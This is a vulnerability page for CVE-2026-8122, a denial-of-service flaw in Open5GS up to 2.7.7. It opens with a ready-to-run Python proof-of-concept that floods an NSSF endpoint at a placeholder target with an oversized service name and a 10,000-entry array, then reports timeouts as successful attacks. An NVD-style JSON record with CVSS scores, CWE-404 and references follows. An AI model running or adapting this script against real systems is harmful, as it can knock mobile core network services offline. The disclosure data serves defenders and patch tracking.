CVE-2026-8122

import requests import json # Target configuration # Open5GS NSSF typically listens on port 8000 (or configured SBI port) target_host = "<TARGET_IP>" target_port = "8000" url = f"http://{target_host}:{target_port}/nssf-nssf/v1/nsi-management" # Helper to create malicious payload targeting the vulnerable function # The vulnerability involves ogs_sbi_discovery_option_add_service_names # We send a large number of service names to induce parsing stress/crash def generate_malicious_payload(): payloads = [] # Case 1: Extremely long service name payloads.append({"nrfId": "http://localhost", "serviceNames": ["A" * 10000]}) # Case 2: Massive array of service names payloads.append({"nrfId": "http://localhost", "serviceNames": ["svc-{}".format(i) for i in range(10000)]}) return payloads print(f"[*] Attempting to trigger DoS on {target_host}...") for payload in generate_malicious_payload(): try: headers = {'Content-Type': 'application/json', 'Accept': 'application/json'} response = requests.post(url, data=json.dumps(payload), headers=headers, timeout=5) print(f"Status: {response.status_code}") except requests.exceptions.Timeout: print("[+] Potential DoS triggered (Server Timeout)") except requests.exceptions.ConnectionError: print("[+] Potential DoS triggered (Connection Refused/Dropped)") except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-8122", "sourceIdentifier": "[email protected]", "published": "2026-05-08T01:16:10.053", "lastModified": "2026-05-11T14:00:25.753", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Open5GS up to 2.7.7. This affects the function ogs_sbi_discovery_option_add_service_names in the library /lib/sbi/message.c of the component NSSF. The manipulation results in denial of service. The attack may be performed from remote. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.7", "matchCriteriaId": "0A46BC99-08E7-4D40-A908-76121E4AFCD5"}]}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/open5gs/open5gs/issues/4435", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/submit/808425", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry", "Exploit"]}, {"url": "https://vuldb.com/vuln/361909", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/361909/cti", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}]}}